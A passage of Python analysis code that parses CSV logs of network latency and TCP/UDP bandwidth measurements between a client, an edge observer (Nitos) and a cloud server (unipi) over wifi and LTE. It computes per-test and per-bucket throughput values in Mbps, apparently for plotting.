if segment == "clientNitos":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> local observer
if senderIdentity != "Client":
continue
else:
ret.append(latency)
elif direction == "Downstream":
#Upstream: Client <- local observer
if receiverIdentity != "Client":
continue
else:
ret.append(latency)
else:
print ("unknown direction")
sys.exit(0)
elif segment == "clientUnipi":
if "remote" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> cloud observer
if senderIdentity != "Client":
continue
else:
ret.append(latency)
elif direction == "Downstream":
#Upstream: Client <- cloud observer
if receiverIdentity != "Client":
continue
else:
ret.append(latency)
else:
print ("unknown direction")
sys.exit(0)
elif segment == "NitosUnipi":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: local observer -> remote server
if senderIdentity != "Observer":
continue
else:
ret.append(latency)
elif direction == "Downstream":
#Upstream: local observer <- remote(cloud) server
if receiverIdentity != "Observer":
continue
else:
ret.append(latency)
else:
print ("unknown direction")
sys.exit(0)
else:
print ("unknown segment")
sys.exit(0)
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readvalues_activebandwidthboxplot(inputfile, noise, segment):
ret = []
Mb_s = 0
sec = 0
lastID = -1
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[12] == "Kbit"
assert row[13] == "nanoTimes"
assert row[9] == "Keyword"
assert row[6] == "ReceiverIdentity"
assert row[5] == "SenderIdentity"
assert row[4] == "Command"
assert row[3] == "Direction"
assert row[1] == "ID"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
testID = row[1]
command = row[4]
senderIdentity = row[5]
receiverIdentity = row[6]
Kbit = float(row[12])
Mbit = Kbit/1000
nanoTimes = float(row[13])
s = nanoTimes/1000000000
direction = row[3]
keyword = row[9]
assert command == "TCPBandwidth" or command == "UDPBandwidth"
if segment == "clientNitos":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> local observer
if senderIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec =s
elif testID == lastID:
#new mesure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec =s
elif direction == "Downstream":
#Upstream: Client <- local observer
if receiverIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec =s
elif testID == lastID:
#new mesure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec =s
else:
print ("unknown direction")
sys.exit(0)
elif segment == "clientUnipi":
if "remote" not in keyword:
continue
if direction == "Upstream":
#Upstream: Client -> remote observer (unipi)
if senderIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec =s
elif testID == lastID:
#new mesure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec =s
elif direction == "Downstream":
#Upstream: Client <- remote observer (unipi)
if receiverIdentity != "Client":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec =s
elif testID == lastID:
#new mesure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec =s
else:
print ("unknown direction")
sys.exit(0)
elif segment == "NitosUnipi":
if "local" not in keyword:
continue
if direction == "Upstream":
#Upstream: MEC observer(local) -> remote (cloud) server
if senderIdentity != "Observer":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec =s
elif testID == lastID:
#new mesure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec =s
elif direction == "Downstream":
#Upstream: MEC observer(local) <- remote (cloud) server
if receiverIdentity != "Observer":
continue
else:
if lastID == -1:
#first measure
lastID = testID
Mb_s = Mbit
sec =s
elif testID == lastID:
#new mesure, same test
Mb_s += Mbit
sec += s
else:
#new test
ret.append(Mb_s/sec)
lastID = testID
Mb_s = Mbit
sec =s
else:
print ("unknown direction")
sys.exit(0)
else:
print ("unknown segment")
sys.exit(0)
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readvalues_activebandwidthlineplot(config_parser, section, command, direction, conn):
noiselist = config_parser.get(section, "noise").split(",")
if conn == "wifi":
dates_list = config_parser.get(section, "dates_activewifi").split(",")
elif conn == "lte":
dates_list = config_parser.get(section, "dates_activelte").split(",")
legend = []
if direction == "Upstream":
legend.append("Client -> Observer (Nitos)")
legend.append("Client -> Observer (unipi)")
legend.append("Observer (Nitos) -> Remote(unipi)")
legend.append("Observer (unipi) -> Remote(unipi)")
elif direction == "Downstream":
legend.append("Observer (Nitos) -> Client")
legend.append("Observer (unipi) -> Client")
legend.append("Remote(unipi) -> Observer (Nitos)")
legend.append("Remote(unipi) -> Observer (unipi)")
clientNitos = {"x":[], "y":[], "legend": legend[0]}
clientUnipi = {"x":[], "y":[], "legend": legend[1]}
NitosUnipi = {"x":[], "y":[], "legend": legend[2]}
lastID = -1
Mbitlist = []
seclist = []
for noise in noiselist:
inputfile = "csv/active/" + command + "-" + direction + "-" + conn + "-noise" + noise + "_"
inputfile += dates_list[0].strip() + "-" + dates_list[-1].strip() + ".csv"
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
if command == "TCPBandwidth" or command == "UDPBandwidth":
assert row[12] == "Kbit"
assert row[13] == "nanoTimes"
elif command == "TCPRTT" or command == "UDPRTT":
assert row[12] == "latency"
else:
print ("unknown command")
sys.exit(0)
assert row[9] == "Keyword"
assert row[5] == "SenderIdentity"
assert row[6] == "ReceiverIdentity"
assert row[3] == "Direction"
assert row[2] == "Timestamp"
assert row[1] == "ID"
except:
print (row)
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
if direction != row[3]:
sys.exit(0)
continue
if command == "TCPBandwidth" or command == "UDPBandwidth":
Kbit = float(row[12])
Mbit = Kbit/1024
nanosec = float(row[13])
sec = 1.0 * nanosec/1000000000
elif command == "TCPRTT" or command == "UDPRTT":
# row[12] == "latency"
measure = 100
if "local" in row[9]:
if row[5] == "Client" or row[6] == "Client":
if command == "TCPBandwidth" or command == "UDPBandwidth":
if lastID == -1 or lastID == row[1]:
Mbitlist.append(Mbit)
seclist.append(sec)
if lastID == -1:
lastID = row[1]
else:
lastID = row[1]
clientNitos["y"].append(1.0 * sum(Mbitlist)/sum(seclist))
clientNitos["x"].append(row[2])
Mbitlist = []
seclist = []
else:
clientNitos["y"].append(100)
elif row[5] == "Server" or row[6] == "Server":
if command == "TCPBandwidth" or command == "UDPBandwidth":
if lastID == -1 or lastID == row[1]:
Mbitlist.append(Mbit)
seclist.append(sec)
if lastID == -1:
lastID = row[1]
else:
lastID = row[1]
NitosUnipi["y"].append(1.0 * sum(Mbitlist)/sum(seclist))
NitosUnipi["x"].append(row[2])
Mbitlist = []
seclist = []
else:
NitosUnipi["y"].append(200)
else:
print ("error")
print (row)
sys.exit(0)
if "remote" in row[9]:
if row[5] == "Client" or row[6] == "Client":
if command == "TCPBandwidth" or command == "UDPBandwidth":
if lastID == -1 or lastID == row[1]:
Mbitlist.append(Mbit)
seclist.append(sec)
if lastID == -1:
lastID = row[1]
else:
lastID = row[1]
clientUnipi["y"].append(1.0 * sum(Mbitlist)/sum(seclist))
clientUnipi["x"].append(row[2])
Mbitlist = []
seclist = []
else:
clientUnipi["y"].append(300)
elif row[5] == "Server" or row[6] == "Server":
continue
else:
print ("error")
print (row)
sys.exit(0)
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return clientNitos, clientUnipi, NitosUnipi
def readbandwidthvalues_timeseries_self(config_parser, section, inputfile, edgeserver, conntype):
assert "SORTED_LEGACY" in inputfile
assert "self" in inputfile
ret = []
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
sys.exit(0)
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
#columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
assert row[13] == "Bytes"
assert row[12] == "Timestamp"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
measuredbytes = row[13]
current_timenstamp = row[12]
keyword = row[6]
clientIP = row[2]
serverIP = row[4]
try:
assert row[2][:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except Exception as e:
print (conntype)
print (inputfile)
print (row[2] [:len(client_subnetaddr)] + "!=" + client_subnetaddr)
linecount += 1
continue
linecount += 1
if (edgeserver == True and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(edgeserver == False and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
bandwidthkbps = float(row[13])
bandwidthMbps = bandwidthkbps / 1000
ret.append(bandwidthMbps)
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_mim(config_parser, section, inputfile, connectiontype, segment, logger):
assert "SORTED_LEGACY" in inputfile
assert "mim" in inputfile
logger.debug("\n")
ret = []
last_testID = ""
if connectiontype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif connectiontype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
logger.critical("unknown connection type")
logger.critical("EXIT")
sys.exit(0)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + (str(linecount) + ": " + str(row)))
continue
#line #3 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except:
print (row)
logger.critical("linecount = 2 " + str(row) + "unexpected columns")
logger.critical ("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp microsecons
clientIP = row[2]
serverIP = row[4]
clientPort = row[3]
serverPort = row[5]
if (segment == "edge" and row[4][:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "remote" and row[4][:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
currentTestID = clientIP + "-" + clientPort + "-" + serverIP + "-" + serverPort
if last_testID == "":
#this is the first row
last_testID = currentTestID
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
############################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
rowcounter = 1
current_micros = 0.0
elif last_testID == currentTestID:
#same test
#################### FOR DEBUGGING ONLY ####################
assert clientIP == lastclientIP
assert serverIP == lastServerIP
assert clientPort == lastClientPort
assert serverPort == lastServerPort
try:
assert previoustimestamp_micros <= currenttimestamp_micros
except:
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("previoustimestamp_micros = " + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros = " + str(currenttimestamp_micros))
sys.exit(0)
##############################################################
rowcounter += 1
if byte > 0:
currentByte += byte
current_micros += currenttimestamp_micros - previoustimestamp_micros
if current_micros >= 1000000: #more than one sec
current_s = current_micros /1000000 #from microseconds to seconds
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
currentByte = 0.0
current_micros = 0.0
previoustimestamp_micros = currenttimestamp_micros
else:
#newtest
if currentByte > 0:
current_s = current_micros /1000000
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
if rowcounter >= _MINROWNUMBER:
for elem in packets_bandwidth:
#print (elem)
ret.append(elem)
#logger.debug("accepted " + last_testID + " with rowcounter " + str(rowcounter))
else:
#print ("skipped " + last_testID + " with rowcounter " + str(rowcounter))
logger.debug("skipped " + last_testID + " with rowcounter " + str(rowcounter))
last_testID = currentTestID
lastclientIP = clientIP
############################FOR DEBUGGING ONLY##############################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
###########################################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
rowcounter = 1
current_micros = 0.0
#print ret
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_mim_usingfixbucket(config_parser, section, inputfile, connectiontype, segment, logger,
bucketsize_microsec):
assert "SORTED" in inputfile
assert "LEGACY" not in inputfile
assert "mim" in inputfile
logger.debug("\n")
ret = []
lastclientIP = ""
pastclientIP = []
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=connectiontype,
logger=logger)
logger.debug("inputfile = " + str(inputfile))
logger.debug("bucketsize_microsec = " + str(bucketsize_microsec))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + (str(linecount) + ": " + str(row)))
continue
#line #3 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except:
print (row)
logger.critical("linecount = 2 " + str(row) + "unexpected columns")
logger.critical ("EXIT")
sys.exit(1)
linecount += 1
#print row
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp microsecons
clientIP = row[2]
serverIP = row[4]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "remote" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if lastclientIP == "":
#this is the first row containing results for the target server
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
pastclientIP.append(clientIP)
lastServerIP = serverIP
############################################################
currentBytes = 0.0
previoustimestamp_micros = currenttimestamp_micros
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
elif lastclientIP == clientIP:
#same testID
#################### FOR DEBUGGING ONLY ####################
assert serverIP == lastServerIP
try:
assert clientIP in pastclientIP
assert previoustimestamp_micros <= currenttimestamp_micros
except Exception as e:
print (clientIP)
print(pastclientIP)
print (linecount)
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("assertion failed: assert previoustimestamp_micros <= currenttimestamp_micros")
logger.critical("line number = " + str(linecount))
logger.critical("previoustimestamp_micros=" + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros=" + str(currenttimestamp_micros))
logger.critical ("EXIT")
sys.exit(-1)
##############################################################
if currenttimestamp_micros < bucket_endtime_microsec:
#packet received within the bucketsize_microsec interval
currentBytes += byte
else:
#packet received within the next bucketsize_microsec interval
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret.append(Mbps)
currentBytes = byte
bucket_starttime_microsec = bucket_endtime_microsec
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
else:
#switch to a new client
pastclientIP.append(clientIP)
#add the last results
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret.append(Mbps)
lastclientIP = clientIP
lastServerIP = serverIP
currentByte = 0.0
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
previoustimestamp_micros = currenttimestamp_micros
#print ret
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_self(config_parser, section, inputfile, edgeserver, conntype):
assert "LEGACY" not in inputfile
assert "SORTED" in inputfile
assert "self" in inputfile
ret = []
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
remoteserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
sys.exit(0)
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
if linecount == 0 or linecount == 1:
linecount += 1
continue
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
except Exception as e:
print (e)
print (row)
sys.exit(1)
linecount += 1
#print row
continue
measuredbytes = row[13]
keyword = row[6]
clientIP = row[2]
serverIP = row[4]
try:
assert row[2][:len(client_subnetaddr)].strip() == client_subnetaddr.strip()
assert conntype.strip() in inputfile
except Exception as e:
print (conntype)
print (inputfile)
print (row[2] [:len(client_subnetaddr)] + "!=" + client_subnetaddr)
linecount += 1
continue
linecount += 1
if (edgeserver == True and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(edgeserver == False and serverIP[:len(remoteserver_subnetaddr)] == remoteserver_subnetaddr):
bandwidthkbps = float(row[13])
bandwidthMbps = bandwidthkbps / 1000
ret.append(bandwidthMbps)
print ("read " + str(linecount) + " from " + inputfile + "(including headers)")
return ret
#returns a dict
def readbandwidthvalues_mim_perclient(config_parser, section, inputfile, connectiontype, segment, logger):
assert "SORTED_LEGACY" in inputfile
assert "mim" in inputfile
logger.debug("\n")
#ret = {}
ret= OrderedDict()
last_testID = ""
if connectiontype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif connectiontype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
logger.critical("unknown connection type.")
logger.critical("EXIT")
sys.exit(0)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + (str(linecount) + ": " + str(row)))
continue
#line #3 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except:
print (row)
logger.critical("linecount = 2 " + str(row) + "unexpercted columns")
logger.critical ("EXIT")
sys.exit(1)
linecount += 1
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp microseconds
clientIP = row[2]
serverIP = row[4]
clientPort = row[3]
serverPort = row[5]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
currentTestID = clientIP + "-" + clientPort + "-" + serverIP + "-" + serverPort
if last_testID == "":
#this is the first row that contains results values
last_testID = currentTestID
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
############################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
totalbytes = byte
rowcounter = 1
current_micros = 0.0
elif last_testID == currentTestID:
#same testID
#################### FOR DEBUGGING ONLY ####################
assert clientIP == lastclientIP
assert serverIP == lastServerIP
assert clientPort == lastClientPort
assert serverPort == lastServerPort
try:
assert previoustimestamp_micros <= currenttimestamp_micros
except Exception as e:
exception_type, exception_obj, exception_traceback = sys.exc_info()
print (linecount)
print ("error on " + str(exception_traceback.tb_frame.f_code.co_filename) + "," + \
str(exception_traceback.tb_lineno))
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("assertion failed: assert previoustimestamp_micros <= currenttimestamp_micros")
logger.critical("line number = " + str(linecount))
logger.critical("previoustimestamp_micros=" + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros=" + str(currenttimestamp_micros))
logger.critical ("EXIT")
sys.exit(-1)
##############################################################
rowcounter += 1
if byte > 0:
#if currenttimestamp_micros - previoustimestamp_micros > 1000000:
# print (currenttimestamp_micros - previoustimestamp_micros)/1000000 * 3
# print(str(currenttimestamp_micros) + "-" + str(previoustimestamp_micros) + ": " + str(currenttimestamp_micros - previoustimestamp_micros))
currentByte += byte
#totalbyte += byte
current_micros += currenttimestamp_micros - previoustimestamp_micros
if current_micros >= 1000000: #more than one sec
current_s = current_micros /1000000 #from microseconds to seconds
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
currentByte = 0.0
current_micros = 0.0
previoustimestamp_micros = currenttimestamp_micros
else:
#new testID
if currentByte > 0:
current_s = current_micros /1000000
bps = (currentByte * 8) / current_s
Mbps = bps / 1000000
packets_bandwidth.append(Mbps)
if rowcounter >= _MINROWNUMBER:
#Kb = 1.0 * totalbyte /1024
#Mb = Kb / 1024
#index = clientIP + str(Mb)
#ret[index]=packets_bandwidth
ret[clientIP]=packets_bandwidth
logger.debug("accepted " + last_testID + " with rowcounter " + str(rowcounter))
else:
logger.debug("skipped " + last_testID + " with rowcounter " + str(rowcounter))
last_testID = currentTestID
lastclientIP = clientIP
############################FOR DEBUGGING ONLY##############################
lastClientPort = clientPort
lastServerIP = serverIP
lastServerPort = serverPort
#################################################################
previoustimestamp_micros = currenttimestamp_micros
packets_bandwidth = []
currentByte = 0.0
totalbyte = byte
rowcounter = 1
current_micros = 0.0
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
#add the last flow results
assert clientIP == lastclientIP
if rowcounter >= _MINROWNUMBER:
ret[clientIP]=packets_bandwidth
logger.debug("accepted " + last_testID + " with rowcounter " + str(rowcounter))
else:
logger.debug("skipped " + last_testID + " with rowcounter " + str(rowcounter))
#logger.debug("dict = " + str(ret))
logger.debug(str(len(ret)) + " clients in ret")
print ("read kn" + str(linecount) + " from " + inputfile + "(including headers)")
return ret
def readbandwidthvalues_mim_perclient_usingfixbucket(config_parser, section, inputfile, connectiontype,
segment, logger, bucketsize_microsec):
assert bucketsize_microsec != None
assert "SORTED" in inputfile
assert "LEGACY" not in inputfile
assert "mim" in inputfile
logger.debug("\n")
ret= OrderedDict()
totalbytes= OrderedDict()
lastclientIP = ""
pastclientIP = []
currentBytes = 0.0
client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr = _get_subnetaddresses(
config_parser=config_parser, section=section, conntype=connectiontype,
logger=logger)
logger.debug("inputfile = " + str(inputfile))
logger.debug("connectiontype = " + str(connectiontype))
logger.debug("segment = " + segment)
logger.debug("client_subnetaddr = " + str(client_subnetaddr))
logger.debug("edgeserver_subnetaddr = " + str(edgeserver_subnetaddr))
logger.debug("cloudserver_subnetaddr = " + str(cloudserver_subnetaddr))
logger.debug("bucketsize_microsec = " + str(bucketsize_microsec))
with open (inputfile, "r") as csvinput:
csvreader = csv.reader(csvinput, delimiter=",")
linecount = 0
for row in csvreader:
#line #0 contains the query
#line #1 contains query's arguments
if linecount == 0 or linecount == 1:
linecount += 1
logger.debug("line " + (str(linecount) + ": " + str(row)))
continue
#line #3 contains the name of each column
# mim-bandwidth columns: ID,Timestamp,ClientIP,ClientPort,ServerIP,ServerPort,Keyword,
# Direction,Protocol,Mode,Type,ID,Timestamp,Bytes
if linecount == 2:
try:
assert row[13] == "Bytes"
assert row[12] == "Timestamp" # in microsec
assert row[6] == "Keyword"
assert row[2] == "ClientIP"
assert row[4] == "ServerIP"
assert row[3] == "ClientPort"
assert row[5] == "ServerPort"
except:
print (row)
logger.critical("linecount = 2 " + str(row) + "unexpected columns")
logger.critical ("EXIT")
sys.exit(1)
linecount += 1
continue
linecount += 1
byte = float(row[13])
currenttimestamp_micros = float(row[12]) #timestamp microseconds
clientIP = row[2]
serverIP = row[4]
if (segment == "edge" and serverIP[:len(edgeserver_subnetaddr)] == edgeserver_subnetaddr) or \
(segment == "cloud" and serverIP[:len(cloudserver_subnetaddr)] == cloudserver_subnetaddr):
if lastclientIP == "":
#this is the first row containing results for the target server
lastclientIP = clientIP
#################### FOR DEBUGGING ONLY ####################
pastclientIP.append(clientIP)
lastServerIP = serverIP
############################################################
totalbytes[clientIP] = byte
ret[clientIP] = []
previoustimestamp_micros = currenttimestamp_micros
bucket_starttime_microsec = currenttimestamp_micros
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
elif lastclientIP == clientIP:
#same testID
#################### FOR DEBUGGING ONLY ####################
assert serverIP == lastServerIP
try:
assert clientIP in pastclientIP
assert previoustimestamp_micros <= currenttimestamp_micros
except Exception as e:
print (clientIP)
print(pastclientIP)
print (linecount)
print (previoustimestamp_micros)
print (currenttimestamp_micros)
logger.critical("assertion failed: assert previoustimestamp_micros <= currenttimestamp_micros")
logger.critical("line number = " + str(linecount))
logger.critical("previoustimestamp_micros=" + str(previoustimestamp_micros))
logger.critical("currenttimestamp_micros=" + str(currenttimestamp_micros))
logger.critical ("EXIT")
sys.exit(-1)
##############################################################
totalbytes[clientIP] += byte
if currenttimestamp_micros < bucket_endtime_microsec:
#packet received within the bucketsize_microsec interval
currentBytes += byte
else:
#packet received within the next bucketsize_microsec interval
if currentBytes == 0:
Mbps = 0
else:
bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret[lastclientIP].append(Mbps)
#currentBytes = 0
currentBytes = byte
bucket_starttime_microsec = bucket_endtime_microsec
bucket_endtime_microsec = bucket_starttime_microsec + bucketsize_microsec
else:
#switch to a new client
pastclientIP.append(clientIP)
#add the last results
if currentBytes == 0:
Mbps = 0
else:
#bucketsize_sec = 1.0 * bucketsize_microsec / 1000000
bucketsize_sec = 1.0 * (previoustimestamp_micros-bucket_starttime_microsec) / 1000000
print (bucketsize_sec)
bps = (1.0 * currentBytes * 8) / bucketsize_sec
Mbps = bps/1000000
ret[lastclientIP].append(Mbps)
lastclientIP = clientIP
lastServerIP = serverIP
currentByte = 0.0
